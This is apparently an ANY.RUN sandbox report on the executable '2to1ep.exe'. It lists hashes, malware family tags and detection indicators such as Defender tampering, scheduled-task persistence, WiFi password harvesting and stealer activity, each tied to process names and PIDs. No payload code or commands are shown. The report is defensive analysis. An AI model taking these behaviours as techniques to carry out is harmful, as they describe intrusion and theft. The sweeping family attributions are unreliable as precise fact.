File name:

2to1ep.exe

Full analysis: https://app.any.run/tasks/16917b49-8fea-4a53-a599-3fb28c4c9987
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: June 03, 2026, 18:45:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto
metasploit
framework
phorpiex
botnet
ipfs
github
phishing
massbass
clickfix
python
quasar
rat
generic
possible-phishing
rustystealer
stealer
tinynuke
stealc
action1rmm
xenorat
loader
koiloader
payload
vidar
networm
amus
evasion
santastealer
qrcode
xworm
valleyrat
silverfox
winos
telegram
pastebin
ghostsocks
proxyware
autoit
screenconnect
tool
rmm-tool
remote
pythonstealer
remusstealer
njrat
dattormm
cobaltstrike
susp-powershell
nuitka
ransomware
cryptolocker
coinminer
miner
donutloader
meterpreter
websocket
ip-check
neshta
remcos
exfiltration
datto
redline
putty
bladabindi
bruteratel
discordrat
whitesnakestealer
pyinstaller
asyncrat
purehvnc
smb
emotet
noescape
wiper
scan
smbscan
discord
deerstealer
agenttesla
destinystealer
dcrat
arch-scr
salatstealer
chromelevator
rdp
eicar-test
whitesnake
auto-sch-xml
shifu
banking
hijackloader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 7 sections
MD5:

7D1A85E807FF9B48EDC2E08A01B35E07

SHA1:

9D772258C620629C299BBAD24C968B1CC476A6A1

SHA256:

65BA3988D38F83B9EE1F31CAFA5BD37DC6B72279F5618AAC94D71A904EFA0CAC

SSDEEP:

98304:i/0CqfgbrcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHI:hvfkWZwE1MUQ881mw0X/ki+BIsG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • METASPLOIT has been found (auto)

      • powershell.exe (PID: 9136)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 8940)
      • fastping_silent_v4.exe (PID: 11216)
    • Changes settings of System certificates

      • support.client.exe (PID: 4284)
      • VOKLIGHT.exe (PID: 20740)
    • Connecting to InterPlanetary File System domains

      • svchost.exe (PID: 2232)
    • PHORPIEX has been detected

      • 2to1ep.exe (PID: 8924)
    • TINYNUKE has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • RUSTYSTEALER has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
    • QUASAR has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • GENERIC has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • Axam.a.exe (PID: 10664)
      • Amus.exe (PID: 10740)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • powershell.exe (PID: 9576)
      • assignment.exe (PID: 16256)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • RustMeDebyg.exe (PID: 19912)
      • 2to1ep.exe (PID: 8924)
      • ClassTicket.exe (PID: 21368)
      • PXray_Cast_Sort.exe (PID: 19796)
      • namu864.exe (PID: 21360)
      • file_a6357da6a05d7266.exe (PID: 21376)
      • Tinder%20Bot.exe (PID: 21480)
      • 123123.exe (PID: 22012)
      • 2to1ep.exe (PID: 8924)
    • Changes powershell execution policy (Bypass)

      • 2to1ep.exe (PID: 8924)
    • STEALC has been detected

      • file_b584670f7ec2f317.exe (PID: 6556)
    • PHORPIEX has been detected (SURICATA)

      • 2to1ep.exe (PID: 8924)
    • CLICKFIX has been detected (SURICATA)

      • svchost.exe (PID: 2232)
      • 2to1ep.exe (PID: 8924)
      • x64-setup.exe (PID: 15452)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2232)
    • KOILOADER has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • ACTION1RMM has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • Gets TEMP folder path (SCRIPT)

      • wscript.exe (PID: 9604)
    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 9604)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 9604)
    • XenoRAT has been detected (FILE)

      • Client.exe (PID: 9996)
      • Client.exe (PID: 10588)
    • Starts CMD.EXE for self-deleting

      • win.exe (PID: 6068)
      • 11.exe (PID: 9892)
    • NETWORM mutex has been found

      • Amus.exe (PID: 10740)
    • Changes the autorun value in the registry

      • Windows 任务的主机进程.exe (PID: 10536)
      • Axam.a.exe (PID: 10664)
      • Windows 任务的主机进程.exe (PID: 11544)
      • Amus.exe (PID: 10740)
      • Axam.exe (PID: 11996)
      • Axam.exe (PID: 12832)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
      • rmd_en_1.exe (PID: 13320)
      • rxd_en_1.exe (PID: 13944)
      • rod_en_1.exe (PID: 13608)
      • assignment.exe (PID: 16256)
      • Rsvp_invite%23903388.exe (PID: 13596)
      • dxwebsetup.exe (PID: 9272)
      • Axam.exe (PID: 16644)
      • Axam.exe (PID: 17192)
      • Axam.exe (PID: 7304)
      • StatingConnectors.exe (PID: 16356)
      • Serials_Checker.exe (PID: 16156)
      • Axam.exe (PID: 10848)
      • Axam.exe (PID: 17976)
      • Axam.exe (PID: 8408)
      • Axam.exe (PID: 19212)
      • Axam.exe (PID: 19392)
      • hell9o.exe (PID: 18748)
      • Axam.exe (PID: 19440)
      • Axam.exe (PID: 18880)
      • Axam.exe (PID: 16172)
      • Axam.exe (PID: 19660)
      • Axam.exe (PID: 20448)
      • Axam.exe (PID: 20544)
      • Axam.exe (PID: 19680)
      • Axam.exe (PID: 20344)
    • VIDAR has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • Create files in the Startup directory

      • Axam.a.exe (PID: 10664)
      • Fast%20Download.exe (PID: 15652)
      • Cloudy.exe (PID: 14412)
    • XWORM has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • VALLEYRAT has been detected

      • Windows 任务的主机进程.exe (PID: 10536)
    • Disables Windows Defender

      • finale.exe (PID: 9708)
    • Changes settings for real-time protection

      • powershell.exe (PID: 12284)
    • Changes Windows Defender settings

      • finale.exe (PID: 9708)
      • powershell.exe (PID: 19304)
      • powershell.exe (PID: 17548)
      • powershell.exe (PID: 19312)
      • powershell.exe (PID: 16320)
    • SANTASTEALER has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
    • Creates scheduled task from XML file

      • Client.exe (PID: 10588)
    • Uses Task Scheduler to run other applications

      • Client.exe (PID: 10588)
    • GHOSTSOCKS has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • SCREENCONNECT has been detected

      • dfsvc.exe (PID: 9084)
      • 2to1ep.exe (PID: 8924)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • ScreenConnect.ClientSetup.exe (PID: 21312)
    • REMUSSTEALER has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • DATTORMM has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • Executing a file with an untrusted certificate

      • kliulij.exe (PID: 13360)
      • VKkQj.exe (PID: 13380)
      • CXmFD.exe (PID: 13556)
      • ww7.exe (PID: 13772)
      • brbotnet.exe (PID: 11036)
      • hnmh.exe (PID: 8484)
      • brbotnet.exe (PID: 14516)
      • jhgkuyyg.exe (PID: 14548)
      • bjbh.exe (PID: 14660)
      • JLFfdd.exe (PID: 14672)
      • cry.exe (PID: 15064)
      • lol.exe (PID: 10436)
      • uRgOy.exe (PID: 8272)
      • sunwukongs.exe (PID: 16044)
      • steamcmd.exe (PID: 16632)
      • dxwebsetup.exe (PID: 9272)
      • gXjgD.exe (PID: 16804)
      • Srfuhxm.exe (PID: 18580)
      • steamcmd.exe (PID: 11420)
    • NJRAT has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
    • Stealers network behavior

      • svchost.exe (PID: 2232)
    • Generic malicious agent network activity observed

      • svchost.exe (PID: 2232)
    • COBALTSTRIKE has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • COINMINER has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • lol1.exe (PID: 20036)
      • lol11.exe (PID: 21384)
    • METERPRETER has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 1223.exe (PID: 18104)
    • CRYPTOLOCKER has been detected (SURICATA)

      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
    • DONUTLOADER has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • donut.exe (PID: 18732)
    • STEALER has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 10444)
      • powershell.exe (PID: 9200)
      • powershell.exe (PID: 4916)
    • REMCOS has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • FXServer.exe (PID: 11076)
    • ASYNCRAT has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
    • BRUTERATEL has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • DISCORDRAT has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • WHITESNAKESTEALER has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • Signed with known abused certificate

      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
      • 2to1ep.exe (PID: 8924)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 9408)
    • NESHTA mutex has been found

      • FXServer.exe (PID: 11076)
      • IniEditor.exe (PID: 18636)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • donut.exe (PID: 18732)
      • ExtremeInjector.exe (PID: 9460)
      • 1210.exe (PID: 18300)
      • bsg.exe (PID: 5864)
      • builder.exe (PID: 15192)
      • builder.exe (PID: 7660)
      • file.exe (PID: 8752)
      • 1223.exe (PID: 18104)
      • RustMeDebyg.exe (PID: 19912)
      • Petya.A.exe (PID: 21248)
      • Update.exe (PID: 21280)
      • namu864.exe (PID: 21360)
      • bnoaprihjatuasss.exe (PID: 21400)
      • InfinityCrypt.exe (PID: 21256)
      • FreeYoutubeDownloader.exe (PID: 21352)
      • mueiel09765.exe (PID: 20372)
      • DRIVEapplet.exe (PID: 21328)
      • ProcessHide32.exe (PID: 21264)
      • backdoor.exe (PID: 21296)
      • hack1226.exe (PID: 21488)
      • lol11.exe (PID: 21384)
      • Security.exe (PID: 12864)
      • standalone_payload.exe (PID: 21392)
      • jeditor.exe (PID: 21476)
      • ClassTicket.exe (PID: 21368)
      • Destover.exe (PID: 21336)
      • ExtremeInjector.exe (PID: 19360)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • Tinder%20Bot.exe (PID: 21480)
      • nc64.exe (PID: 21320)
      • Phantom.exe (PID: 20232)
      • PrivacyPolicy.exe (PID: 11852)
      • CryptoWall.exe (PID: 21288)
      • Jigsaw.exe (PID: 21344)
      • PXray_Cast_Sort.exe (PID: 19796)
      • file_a6357da6a05d7266.exe (PID: 21376)
      • lol1.exe (PID: 20036)
      • ScreenConnect.ClientSetup.exe (PID: 21312)
      • SharpHound.exe (PID: 21272)
      • executavel_temporario.exe (PID: 22516)
      • Gui.exe (PID: 15540)
      • 123123.exe (PID: 22012)
      • 1488.exe (PID: 14064)
      • 5252.exe (PID: 22652)
    • Actions looks like stealing of personal data

      • cvf.exe (PID: 16088)
    • REMCOS has been detected

      • prueba.exe (PID: 16824)
    • REMCOS mutex has been found

      • prueba.exe (PID: 16824)
      • prueba.exe (PID: 17084)
      • prueba.exe (PID: 18384)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 17256)
    • DEERSTEALER has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • Adds path to the Windows Defender exclusion list

      • msedge.exe (PID: 13212)
      • fo4translator.exe (PID: 12712)
      • finale.exe (PID: 9708)
      • XClient.exe (PID: 11448)
      • conhost.exe (PID: 20840)
      • RuntimeBroker.exe (PID: 14368)
    • NJRAT mutex has been found

      • Fast%20Download.exe (PID: 15660)
      • Fast%20Download.exe (PID: 15652)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 9604)
    • The EICAR Standard Anti-Virus Test File is detected

      • justpoc.exe (PID: 18376)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 9200)
      • powershell.exe (PID: 4916)
    • CHROMELEVATOR has been found (auto)

      • 2to1ep.exe (PID: 8924)
      • 5252.exe (PID: 22652)
    • DESTINYSTEALER has been found (auto)

      • 2to1ep.exe (PID: 8924)
    • SCREENCONNECT has been found (auto)

      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • ScreenConnect.ClientSetup.exe (PID: 21312)
    • EMOTET mutex has been found

      • 640.exe (PID: 20848)
      • 640.exe (PID: 21608)
      • paramssps.exe (PID: 21956)
      • paramssps.exe (PID: 21108)
    • NOESCAPE has been detected

      • NoEscape.exe (PID: 20912)
    • PUREHVNC has been found (auto)

      • mueiel09765.exe (PID: 20372)
    • Changes the Windows auto-update feature

      • taskmoder.exe (PID: 18692)
    • Attempting to scan the network

      • Meredrop.exe (PID: 21124)
    • VIDAR has been detected

      • chrome_134.exe (PID: 21240)
    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 18700)
    • Execute application with conhost.exe as parent process

      • firefox.exe (PID: 1500)
      • msedge.exe (PID: 8776)
      • chrome.exe (PID: 20852)
      • chrome.exe (PID: 6060)
      • firefox.exe (PID: 23468)
      • msedge.exe (PID: 25500)
    • SMBSCAN has been detected (SURICATA)

      • Meredrop.exe (PID: 21124)
    • WhiteSnake has been detected

      • bnkrigkawd.exe (PID: 18392)
    • SHIFU has been detected

      • sanghyun-guest.exe (PID: 20928)
      • sanghyun.exe (PID: 20792)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 4916)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 4916)
    • Disables Windows Smartscreen

      • powershell.exe (PID: 10120)
    • WiFi password harvest via netsh

      • cssgo.exe (PID: 17492)
  • SUSPICIOUS

    • Process drops python dynamic module

      • 2to1ep.exe (PID: 3352)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 9916)
      • Isass.exe (PID: 15280)
      • rsh-192-168-1-89.exe (PID: 20944)
      • ui.exe (PID: 18116)
      • evil.exe (PID: 20864)
    • Executable content was dropped or overwritten

      • 2to1ep.exe (PID: 3352)
      • 2to1ep.exe (PID: 8924)
      • win.exe (PID: 6068)
      • Client.exe (PID: 9996)
      • Qbix01.exe (PID: 9796)
      • Prolin.exe (PID: 9988)
      • 1.exe (PID: 10332)
      • fastping_silent_v4.exe (PID: 11216)
      • Axam.a.exe (PID: 10664)
      • Amus.exe (PID: 10740)
      • CryptoLocker.exe (PID: 12932)
      • Pinaview.exe (PID: 13164)
      • pardufrigi_installer_1.0.p1.exe (PID: 9812)
      • Rsvp_invite%23903388.exe (PID: 13596)
      • rmd_en_1.exe (PID: 13320)
      • rod_en_1.exe (PID: 13608)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 9916)
      • rxd_en_1.exe (PID: 13944)
      • pardufrigi_installer_1.0.p1.tmp (PID: 14136)
      • Pinaview.tmp (PID: 14120)
      • RMO_SE~2.EXE (PID: 9944)
      • setup.exe (PID: 14300)
      • is-A140U.tmp (PID: 14020)
      • is-BE52S.tmp (PID: 8848)
      • G7_Update.exe (PID: 13388)
      • csc.exe (PID: 14192)
      • assignment.exe (PID: 16256)
      • FXServer.exe (PID: 11076)
      • Isass.exe (PID: 15280)
      • dxwebsetup.exe (PID: 9272)
      • 444.exe (PID: 16332)
      • dxwsetup.exe (PID: 17708)
      • StatingConnectors.exe (PID: 16356)
      • csc.exe (PID: 16128)
      • csc.exe (PID: 15812)
      • lol.exe (PID: 10436)
      • csc.exe (PID: 16268)
      • csc.exe (PID: 16192)
      • IniEditor.exe (PID: 18636)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • donut.exe (PID: 18732)
      • ExtremeInjector.exe (PID: 9460)
      • 1223.exe (PID: 18104)
      • 1210.exe (PID: 18300)
      • ljgksdtihd.exe (PID: 3412)
      • pfntjejghjsdkr.exe (PID: 19804)
      • builder.exe (PID: 15192)
      • bsg.exe (PID: 5864)
      • builder.exe (PID: 7660)
      • RustMeDebyg.exe (PID: 19912)
      • file.exe (PID: 8752)
      • taskmoder.exe (PID: 18692)
      • lol1.exe (PID: 20036)
      • Phantom.exe (PID: 20232)
      • ExtremeInjector.exe (PID: 19360)
      • fo4translator.exe (PID: 12712)
      • steamcmd.exe (PID: 16632)
      • haeum.exe (PID: 20920)
      • Update.exe (PID: 21280)
      • rsh-192-168-1-89.exe (PID: 20944)
      • ScreenConnect.ClientSetup.exe (PID: 21312)
      • bnoaprihjatuasss.exe (PID: 21400)
      • PrivacyPolicy.exe (PID: 11852)
      • InfinityCrypt.exe (PID: 21256)
      • ProcessHide32.exe (PID: 21264)
      • ClassTicket.exe (PID: 21368)
      • SharpHound.exe (PID: 21272)
      • CryptoWall.exe (PID: 21288)
      • FreeYoutubeDownloader.exe (PID: 21352)
      • nc64.exe (PID: 21320)
      • hack1226.exe (PID: 21488)
      • PXray_Cast_Sort.exe (PID: 19796)
      • namu864.exe (PID: 21360)
      • mueiel09765.exe (PID: 20372)
      • file_a6357da6a05d7266.exe (PID: 21376)
      • Tinder%20Bot.exe (PID: 21480)
      • standalone_payload.exe (PID: 21392)
      • safman_setup.exe (PID: 21224)
      • backdoor.exe (PID: 21296)
      • Security.exe (PID: 12864)
      • jeditor.exe (PID: 21476)
      • Petya.A.exe (PID: 21248)
      • Gui.exe (PID: 15540)
      • executavel_temporario.exe (PID: 22516)
      • DRIVEapplet.exe (PID: 21328)
      • lol11.exe (PID: 21384)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • Destover.exe (PID: 21336)
      • Jigsaw.exe (PID: 21344)
      • ui.exe (PID: 18116)
      • 1488.exe (PID: 14064)
      • 123123.exe (PID: 22012)
      • evil.exe (PID: 20864)
      • RDPW_Installer.exe (PID: 20856)
      • 5252.exe (PID: 22652)
      • 640.exe (PID: 21608)
      • powershell.exe (PID: 11204)
      • Cloudy.exe (PID: 14412)
      • conhost.exe (PID: 13144)
      • xcopy.exe (PID: 26584)
      • VC_redist.x64.exe (PID: 20216)
      • xcopy.exe (PID: 16348)
      • csc.exe (PID: 19516)
      • 52.exe (PID: 10552)
    • Application launched itself

      • 2to1ep.exe (PID: 3352)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
      • cvf.exe (PID: 12108)
      • Isass.exe (PID: 15280)
      • VC_redist.x64.exe (PID: 2760)
      • 640.exe (PID: 20848)
      • rsh-192-168-1-89.exe (PID: 20944)
      • steamcmd.exe (PID: 16632)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 9916)
      • evil.exe (PID: 20864)
      • paramssps.exe (PID: 21956)
      • powershell.exe (PID: 19304)
      • powershell.exe (PID: 17548)
      • powershell.exe (PID: 16320)
      • powershell.exe (PID: 19312)
    • The process drops C-runtime libraries

      • 2to1ep.exe (PID: 3352)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 9916)
      • Isass.exe (PID: 15280)
      • steamcmd.exe (PID: 16632)
      • rsh-192-168-1-89.exe (PID: 20944)
      • ui.exe (PID: 18116)
      • evil.exe (PID: 20864)
    • Loads Python modules

      • 2to1ep.exe (PID: 8924)
      • Isass.exe (PID: 7912)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 3172)
    • Creates scheduled task with ONLOGON parameter

      • 2to1ep.exe (PID: 8924)
      • cmd.exe (PID: 8940)
      • fastping_silent_v4.exe (PID: 11216)
    • Creates scheduled task with highest privileges

      • cmd.exe (PID: 8940)
      • schtasks.exe (PID: 812)
      • schtasks.exe (PID: 9760)
      • schtasks.exe (PID: 17584)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 8940)
      • cmd.exe (PID: 7148)
      • cmd.exe (PID: 9388)
      • cmd.exe (PID: 9808)
      • cmd.exe (PID: 10580)
      • cmd.exe (PID: 11288)
      • cmd.exe (PID: 11612)
      • cmd.exe (PID: 12072)
      • cmd.exe (PID: 13100)
      • cmd.exe (PID: 10064)
      • cmd.exe (PID: 14528)
      • cmd.exe (PID: 15252)
      • cmd.exe (PID: 16308)
      • cmd.exe (PID: 16172)
      • cmd.exe (PID: 16808)
      • cmd.exe (PID: 16984)
      • cmd.exe (PID: 18364)
      • cmd.exe (PID: 18448)
      • cmd.exe (PID: 18916)
      • cmd.exe (PID: 19292)
      • cmd.exe (PID: 19124)
      • cmd.exe (PID: 19796)
      • cmd.exe (PID: 6140)
      • cmd.exe (PID: 20612)
      • cmd.exe (PID: 20636)
      • cmd.exe (PID: 20652)
      • cmd.exe (PID: 20960)
      • cmd.exe (PID: 21112)
      • cmd.exe (PID: 21136)
      • cmd.exe (PID: 21144)
      • cmd.exe (PID: 21540)
      • cmd.exe (PID: 23396)
      • cmd.exe (PID: 23860)
      • cmd.exe (PID: 6248)
      • cmd.exe (PID: 24604)
      • cmd.exe (PID: 22452)
      • cmd.exe (PID: 4972)
      • cmd.exe (PID: 15884)
      • cmd.exe (PID: 24556)
      • cmd.exe (PID: 18868)
      • cmd.exe (PID: 16100)
      • cmd.exe (PID: 18292)
      • cmd.exe (PID: 14400)
      • cmd.exe (PID: 1152)
      • cmd.exe (PID: 25972)
      • cmd.exe (PID: 18088)
      • cmd.exe (PID: 9392)
      • cmd.exe (PID: 26136)
      • cmd.exe (PID: 6244)
      • cmd.exe (PID: 19512)
      • cmd.exe (PID: 19920)
      • cmd.exe (PID: 18312)
      • cmd.exe (PID: 25916)
      • cmd.exe (PID: 22028)
      • cmd.exe (PID: 8644)
    • Adds/modifies Windows certificates

      • support.client.exe (PID: 4284)
      • VOKLIGHT.exe (PID: 20740)
    • Possible Social Engineering Attempted

      • svchost.exe (PID: 2232)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • mshta.exe (PID: 6872)
      • mshta.exe (PID: 3156)
      • mshta.exe (PID: 8060)
      • mshta.exe (PID: 8984)
      • mshta.exe (PID: 9944)
      • mshta.exe (PID: 15888)
      • mshta.exe (PID: 20988)
      • mshta.exe (PID: 20976)
      • mshta.exe (PID: 21432)
    • The process creates files with name similar to system file names

      • 2to1ep.exe (PID: 8924)
      • Rsvp_invite%23903388.exe (PID: 13596)
      • fastping_silent_v4.exe (PID: 11216)
      • 444.exe (PID: 16332)
      • steamcmd.exe (PID: 16632)
    • The process executes files with name similar to system file names

      • 2to1ep.exe (PID: 8924)
      • steamcmd.exe (PID: 16632)
      • crypted.exe (PID: 21212)
      • cmd.exe (PID: 26136)
      • cmd.exe (PID: 9392)
    • The process executes Powershell scripts

      • powershell.exe (PID: 8060)
      • powershell.exe (PID: 9464)
      • powershell.exe (PID: 9788)
      • powershell.exe (PID: 10120)
      • powershell.exe (PID: 9408)
      • powershell.exe (PID: 9200)
      • powershell.exe (PID: 10444)
      • powershell.exe (PID: 10748)
      • powershell.exe (PID: 10760)
      • powershell.exe (PID: 11204)
      • powershell.exe (PID: 11252)
      • powershell.exe (PID: 13564)
      • powershell.exe (PID: 11468)
      • powershell.exe (PID: 9532)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 17096)
      • powershell.exe (PID: 16336)
      • powershell.exe (PID: 17548)
      • powershell.exe (PID: 17908)
      • powershell.exe (PID: 12100)
      • powershell.exe (PID: 5800)
      • powershell.exe (PID: 16320)
      • powershell.exe (PID: 19304)
      • powershell.exe (PID: 19312)
      • powershell.exe (PID: 4712)
      • powershell.exe (PID: 20132)
      • powershell.exe (PID: 20732)
      • powershell.exe (PID: 20760)
      • powershell.exe (PID: 20768)
      • powershell.exe (PID: 20824)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8060)
      • powershell.exe (PID: 9464)
      • powershell.exe (PID: 9788)
      • powershell.exe (PID: 10120)
      • powershell.exe (PID: 9408)
      • powershell.exe (PID: 9200)
      • powershell.exe (PID: 10444)
      • powershell.exe (PID: 10760)
      • powershell.exe (PID: 10748)
      • powershell.exe (PID: 11204)
      • powershell.exe (PID: 11252)
      • powershell.exe (PID: 13564)
      • powershell.exe (PID: 11468)
      • powershell.exe (PID: 9532)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 17096)
      • powershell.exe (PID: 16336)
      • powershell.exe (PID: 17548)
      • powershell.exe (PID: 17908)
      • powershell.exe (PID: 12100)
      • powershell.exe (PID: 16320)
      • powershell.exe (PID: 5800)
      • powershell.exe (PID: 19304)
      • powershell.exe (PID: 19312)
      • powershell.exe (PID: 4712)
      • powershell.exe (PID: 20132)
      • powershell.exe (PID: 20760)
      • powershell.exe (PID: 20768)
      • powershell.exe (PID: 20824)
      • powershell.exe (PID: 20732)
    • Starts POWERSHELL.EXE for commands execution

      • 2to1ep.exe (PID: 8924)
      • cmd.exe (PID: 9388)
      • wscript.exe (PID: 9604)
      • finale.exe (PID: 9708)
      • cmd.exe (PID: 10064)
      • better.exe (PID: 12460)
      • ljgksdtihd.exe (PID: 3412)
      • cmd.exe (PID: 21112)
      • powershell.exe (PID: 19304)
      • powershell.exe (PID: 17548)
      • powershell.exe (PID: 19312)
      • cmd.exe (PID: 18916)
      • powershell.exe (PID: 16320)
      • conhost.exe (PID: 20840)
      • cmd.exe (PID: 19920)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 9388)
      • cmd.exe (PID: 18916)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 9388)
      • cmd.exe (PID: 18916)
    • Reads the date of Windows installation

      • win.exe (PID: 6068)
      • 11.exe (PID: 9892)
      • msedge.exe (PID: 13212)
      • fo4translator.exe (PID: 12712)
      • XClient.exe (PID: 11448)
      • conhost.exe (PID: 20840)
      • RuntimeBroker.exe (PID: 14368)
      • dw20.exe (PID: 16804)
    • Contacting a server suspected of hosting an Exploit Kit

      • 2to1ep.exe (PID: 8924)
    • The process executes VB scripts

      • wscript.exe (PID: 9604)
      • wscript.exe (PID: 11524)
      • wscript.exe (PID: 13632)
      • wscript.exe (PID: 13784)
      • wscript.exe (PID: 14688)
    • Executing commands from a ".bat" file

      • 2to1ep.exe (PID: 8924)
      • cmd.exe (PID: 12072)
      • G7_Update.exe (PID: 13388)
      • cmd.exe (PID: 11288)
      • Serials_Checker.exe (PID: 16156)
      • powershell.exe (PID: 9576)
      • BCDC.tmp (PID: 22376)
      • RDPW_Installer.exe (PID: 20856)
      • patcher.exe (PID: 20716)
      • cmd.exe (PID: 20636)
      • cmd.exe (PID: 20652)
      • sanghyun.exe (PID: 20792)
      • sanghyun-guest.exe (PID: 20928)
    • Potential Corporate Privacy Violation

      • 2to1ep.exe (PID: 8924)
      • svchost.exe (PID: 2232)
      • steamcmd.exe (PID: 16632)
      • Meredrop.exe (PID: 21124)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 9604)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 9604)
    • Creates file in the systems drive root

      • Prolin.exe (PID: 9988)
      • Amus.exe (PID: 10740)
      • Axam.a.exe (PID: 10664)
      • Axam.exe (PID: 11996)
      • Axam.exe (PID: 12832)
      • FXServer.exe (PID: 11076)
      • assignment.exe (PID: 16256)
      • Axam.exe (PID: 16644)
      • Axam.exe (PID: 17192)
      • Axam.exe (PID: 7304)
      • Axam.exe (PID: 10848)
      • Axam.exe (PID: 17976)
      • Axam.exe (PID: 8408)
      • IniEditor.exe (PID: 18636)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • ExtremeInjector.exe (PID: 9460)
      • Axam.exe (PID: 19440)
